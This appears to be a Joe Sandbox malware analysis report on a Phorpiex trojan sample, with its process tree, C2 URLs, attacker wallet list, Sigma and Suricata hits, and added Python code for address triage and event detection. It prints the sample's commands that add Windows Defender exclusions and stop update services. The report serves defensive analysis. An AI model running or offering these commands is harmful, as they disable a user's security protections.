
Windows Analysis Report
Bjl3geiFEK.exe

Overview

General Information

Sample name: Bjl3geiFEK.exe (renamed because the original name is a hash value)
Original sample name: ed9fbbbe548c41479cb70e4d694793d0.exe
Analysis ID: 1543742
MD5: ed9fbbbe548c41479cb70e4d694793d0
SHA1: a0bde162d2241ab2acb58544511a41df30a096a7
SHA256: 6fc8b5b8a90cf8ba7e0eb930fcdde776f8eeb3f37913318df7766a365e13fa8e
Tags: 32, exe, trojan

Detection

Phorpiex
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Phorpiex
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • Bjl3geiFEK.exe (PID: 6852 cmdline: "C:\Users\user\Desktop\Bjl3geiFEK.exe" MD5: ED9FBBBE548C41479CB70E4D694793D0)
    • 33080.scr (PID: 7112 cmdline: "C:\Users\user\AppData\Local\Temp\33080.scr" /S MD5: 06560B5E92D704395BC6DAE58BC7E794)
      • sysppvrdnvs.exe (PID: 3060 cmdline: C:\Windows\sysppvrdnvs.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
        • cmd.exe (PID: 4488 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4092 cmdline: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 7120 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 2188 cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 2380 cmdline: sc stop UsoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 5940 cmdline: sc stop WaaSMedicSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 6512 cmdline: sc stop wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 3620 cmdline: sc stop DoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 6996 cmdline: sc stop BITS /wait MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • 818921588.exe (PID: 1516 cmdline: C:\Users\user\AppData\Local\Temp\818921588.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
  • sysppvrdnvs.exe (PID: 4628 cmdline: "C:\Windows\sysppvrdnvs.exe" MD5: 06560B5E92D704395BC6DAE58BC7E794)
  • cleanup
Malware Configuration

Phorpiex, extracted from 2.2.sysppvrdnvs.exe.400000.0.unpack

C2 url:
  http://185.215.113.66/
  http://91.202.233.141/
Wallet:
  15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
  1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
  lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w
  ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
  zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3
  zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v
  cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf
  erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx
  kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn
  inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9
  osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3
  one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x
  3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
  3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
  DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
  DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe
  t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
  terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5
  thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur
  tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2
  stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
  stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0
  sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz
  sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6
  bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
  bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
  bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
  btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy
  ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17
  bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
  cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr
  addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg
  nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb
  GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
  Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV
  EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM
  B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA
  BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH
  UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb
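The wallet list is what the clipper component swaps into the victim's clipboard (see the clipboard read/modify signatures above), so the first triage question is which address formats it covers and which hosts can go straight onto a blocklist. The Python below is an added example written for this page, not code from the report or from Joe Sandbox. It embeds a subset of the configuration above, copied verbatim, and classifies each address by structure only: URI scheme, bech32 human-readable part, or alphabet. The bech32 split is structural (the checksum is not recomputed), and no chain is inferred from a base58 prefix because such prefixes are ambiguous. The grouping function then shows something visible in the list itself: five Cosmos-SDK addresses carry the same payload under different prefixes, i.e. one key behind all five.

```python
from collections import Counter
from urllib.parse import urlparse

BECH32_CHARSET = set("qpzry9x8gf2tvdw0s3jn54khce6mua7l")
BASE58_CHARSET = set("123456789ABCDEFGHJKLMNPQRSTUVW"
                     "XYZabcdefghijkmnopqrstuvwxyz")

# Subset of the configuration extracted in the report, copied verbatim.
CONFIG = {
    "C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"],
    "Wallet": [
        "15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC",
        "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK",
        "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp",
        "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn",
        "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3",
        "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj",
        "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0",
        "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz",
        "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr",
        "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr",
        "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd",
        "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg",
        "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17",
        "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r",
        "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb",
        "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3",
    ],
}


def c2_hosts(cfg):
    """Hostnames from the C2 URL list, suitable for a blocklist."""
    return sorted({urlparse(u).hostname for u in cfg["C2 url"]})


def split_bech32(addr):
    """(hrp, data) if addr has bech32/bech32m structure, else None.

    The data part is checked against the bech32 alphabet (which excludes
    '1', 'b', 'i' and 'o') and for the 6-character checksum length; the
    checksum itself is not recomputed here.
    """
    if addr != addr.lower() or "1" not in addr:
        return None
    hrp, data = addr.rsplit("1", 1)
    if not hrp or len(data) < 6 or not set(data) <= BECH32_CHARSET:
        return None
    return hrp, data


def classify(addr):
    """Coarse family label: uri:<scheme>, prefix:nano_, bech32:<hrp>,
    base58 or other. Chains are not inferred from base58 prefixes."""
    if ":" in addr:
        return "uri:" + addr.split(":", 1)[0]
    if addr.startswith("nano_"):
        return "prefix:nano_"
    parts = split_bech32(addr)
    if parts:
        return "bech32:" + parts[0]
    if set(addr) <= BASE58_CHARSET:
        return "base58"
    return "other"


def family_counts(wallets):
    """Number of attacker addresses per family."""
    return Counter(classify(w) for w in wallets)


def shared_payload_groups(wallets):
    """Group bech32 addresses whose data part minus the checksum is identical.

    Cosmos-SDK chains can encode the same 20-byte account hash under
    different prefixes, so a shared payload means one key controls all of
    them and one seizure or tracing request covers the whole group."""
    groups = {}
    for w in wallets:
        parts = split_bech32(w)
        if parts:
            groups.setdefault(parts[1][:-6], []).append(parts[0])
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


if __name__ == "__main__":
    print("C2 hosts:", c2_hosts(CONFIG))
    for fam, n in sorted(family_counts(CONFIG["Wallet"]).items()):
        print(f"{n:2d}  {fam}")
    for payload, hrps in shared_payload_groups(CONFIG["Wallet"]).items():
        print("shared account hash", payload, "across", hrps)
```

Run it against the full list from the report to get the complete coverage picture; only the bech32 grouping and the URI schemes are safe to take at face value, everything else needs a checksum or chain-specific decoder before it is used as an indicator.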
Yara matches, dropped files:
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
C:\Windows\sysppvrdnvs.exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
C:\Users\user\AppData\Local\Temp\33080.scr | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
C:\Users\user\AppData\Local\Temp\818921588.exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security

Yara matches, memory dumps:
Source | Rule | Description | Author
00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
(9 further entries not shown in this view)

Yara matches, unpacked PE files:
Source | Rule | Description | Author
18.0.818921588.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
2.0.sysppvrdnvs.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
1.2.33080.scr.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
2.2.sysppvrdnvs.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
17.2.sysppvrdnvs.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
(3 further entries not shown in this view)

                              Operating System Destruction

Source: Process started
Author: Joe Security
Data:
  Command (also CommandLine, ProcessCommandLine): "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
  CommandLine|base64offset|contains: (empty)
  Image (also NewProcessName, OriginalFileName): C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: C:\Windows\sysppvrdnvs.exe
  ParentImage: C:\Windows\sysppvrdnvs.exe
  ParentProcessId: 3060
  ParentProcessName: sysppvrdnvs.exe
  ProcessId: 2188
  ProcessName: cmd.exe

                              System Summary

Source: Process started (reported twice for this event)
Author: Florian Roth (Nextron Systems)
Data:
  Command (also CommandLine, ProcessCommandLine): "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
  CommandLine|base64offset|contains: (empty)
  Image (also NewProcessName, OriginalFileName): C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: C:\Windows\sysppvrdnvs.exe
  ParentImage: C:\Windows\sysppvrdnvs.exe
  ParentProcessId: 3060
  ParentProcessName: sysppvrdnvs.exe
  ProcessId: 4488
  ProcessName: cmd.exe

Source: File created
Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
Data: EventID: 11, Image: C:\Users\user\Desktop\Bjl3geiFEK.exe, ProcessId: 6852, TargetFilename: C:\Users\user\AppData\Local\Temp\33080.scr

Source: File created
Author: frack113
Data: EventID: 11, Image: C:\Users\user\Desktop\Bjl3geiFEK.exe, ProcessId: 6852, TargetFilename: C:\Users\user\AppData\Local\Temp\33080.scr

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: C:\Windows\sysppvrdnvs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\33080.scr, ProcessId: 7112, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data:
  Command (also CommandLine, ProcessCommandLine): powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
  CommandLine|base64offset|contains: ^
  Image (also NewProcessName, OriginalFileName): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
  ParentImage: C:\Windows\SysWOW64\cmd.exe
  ParentProcessId: 4488
  ParentProcessName: cmd.exe
  ProcessId: 4092
  ProcessName: powershell.exe
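Each Sigma hit above keys on one field of one event: the exclusion cmdlet in a command line, the sc stop batch, and the Run value written by a .scr in Temp. The Python below is an added example for this page, not Joe Sandbox or SigmaHQ code; it applies the same three checks to Sysmon-style records and is meant to run over an EDR export. The records are constructed here to mirror the process tree in the report (field names follow Sysmon event IDs 1 and 13), and the set of update services and the list of "broad" exclusion roots are choices made for this example, not values taken from the report.

```python
import re

# Services the sample stopped, compared case-insensitively.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "dosvc", "bits"}
# Exclusion roots that switch Defender off for anything a dropper can write
# (list chosen for this example).
BROAD_EXCLUSION_ROOTS = {"$env:windir", "$env:systemroot", "$env:temp", "$env:tmp",
                         "$env:userprofile", "$env:systemdrive",
                         "c:\\", "c:\\windows", "c:\\users"}

EXCLUSION_RE = re.compile(
    r"(?:add|set)-mppreference\s+[^;\"]*?-exclusion(?:path|process|extension)\s+([^;\"]+)",
    re.IGNORECASE)
SC_STOP_RE = re.compile(r"\bsc(?:\.exe)?\s+stop\s+([^\s&|]+)", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)


def check_process(event):
    """Findings for one process-creation record (Sysmon event ID 1 fields)."""
    cmd = event["CommandLine"]
    findings = []
    paths = [p.strip().rstrip("\\").lower() for p in EXCLUSION_RE.findall(cmd)]
    if paths:
        findings.append({"rule": "defender_exclusion_added", "pid": event["ProcessId"],
                         "paths": paths,
                         "broad": any(p in BROAD_EXCLUSION_ROOTS for p in paths)})
    stopped = {s.lower() for s in SC_STOP_RE.findall(cmd)}
    hit = sorted(stopped & UPDATE_SERVICES)
    if len(hit) >= 2:  # a single stop may be admin work; a batch is not
        findings.append({"rule": "update_services_stopped", "pid": event["ProcessId"],
                         "services": hit})
    return findings


def check_registry(event):
    """Findings for one registry value-set record (Sysmon event ID 13 fields)."""
    if not RUN_KEY_RE.search(event["TargetObject"]):
        return []
    writer = event["Image"].lower()
    target = event["Details"].lower().strip('"')
    # Writer lives in Temp or poses as a screensaver, or the autorun target
    # sits directly in C:\Windows rather than in a subdirectory.
    suspicious = ("\\appdata\\local\\temp\\" in writer
                  or writer.endswith(".scr")
                  or (target.startswith("c:\\windows\\") and target.count("\\") == 2))
    if not suspicious:
        return []
    return [{"rule": "run_key_persistence", "pid": event["ProcessId"],
             "value": event["TargetObject"].rsplit("\\", 1)[1],
             "target": event["Details"]}]


def triage(events):
    """Run the checks over a list of records and return all findings in order."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            findings.extend(check_process(ev))
        elif ev["EventID"] == 13:
            findings.extend(check_registry(ev))
    return findings


# Constructed records mirroring the report's process tree; the last two are
# benign controls that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4092,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -Command "Add-MpPreference -ExclusionPath $env:windir; '
                    r'Add-MpPreference -ExclusionPath $env:TEMP; '
                    r'Add-MpPreference -ExclusionPath $env:USERPROFILE"'},
    {"EventID": 1, "ProcessId": 2188, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & '
                    r'sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait'},
    {"EventID": 13, "ProcessId": 7112, "Image": r"C:\Users\user\AppData\Local\Temp\33080.scr",
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings",
     "Details": r"C:\Windows\sysppvrdnvs.exe"},
    {"EventID": 1, "ProcessId": 5000, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -Command Get-MpPreference"},
    {"EventID": 1, "ProcessId": 5001, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c sc stop Spooler"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The exclusion regex fires on the cmd.exe wrapper as well as on the powershell.exe child when both records are present, which is what you want for a hunt but should be deduplicated by parent-child relationship before alerting.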
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-28T11:11:12.755493+0100 | 2022050 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.4 | 49730 | TCP
2024-10-28T11:11:13.063265+0100 | 2022051 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.4 | 49730 | TCP
2024-10-28T11:11:23.546010+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 50345 | 5.239.153.192 | 40500 | UDP
2024-10-28T11:11:28.559672+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 50345 | 5.75.95.114 | 40500 | UDP
2024-10-28T11:11:21.513089+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:23.515407+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:26.495491+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49740 | 91.202.233.141 | 80 | TCP
2024-10-28T11:11:29.339713+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 57562 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:31.283957+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 57563 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:11.839337+0100 | 2837677 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.4 | 49731 | TCP
2024-10-28T11:11:23.823677+0100 | 2837677 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.4 | 49734 | TCP
2024-10-28T11:11:21.513089+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:23.515407+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:29.339713+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 57562 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:31.283957+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 57563 | 185.215.113.66 | 80 | TCP


                              AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe, Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Windows\sysppvrdnvs.exe, Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: 2.2.sysppvrdnvs.exe.400000.0.unpack, Malware Configuration Extractor: Phorpiex (C2 URLs http://185.215.113.66/ and http://91.202.233.141/ plus the wallet list; the full configuration is reproduced in the overview above)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe, ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\33080.scr, ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\818921588.exe, ReversingLabs: Detection: 81%
Source: C:\Windows\sysppvrdnvs.exe, ReversingLabs: Detection: 81%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe, Joe Sandbox ML: detected
Source: C:\Windows\sysppvrdnvs.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\818921588.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Code function: 1_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 1_2_0040C830
Source: C:\Windows\sysppvrdnvs.exe, Code function: 2_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 2_2_0040C830
Source: C:\Windows\sysppvrdnvs.exe, Code function: 17_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 17_2_0040C830

                              Phishing

Source: Yara match, File source: 18.0.818921588.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.33080.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.0.33080.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.818921588.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: 33080.scr PID: 7112, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: sysppvrdnvs.exe PID: 3060, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: sysppvrdnvs.exe PID: 4628, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: 818921588.exe PID: 1516, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe, type: DROPPED
Source: Yara match, File source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\33080.scr, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\818921588.exe, type: DROPPED
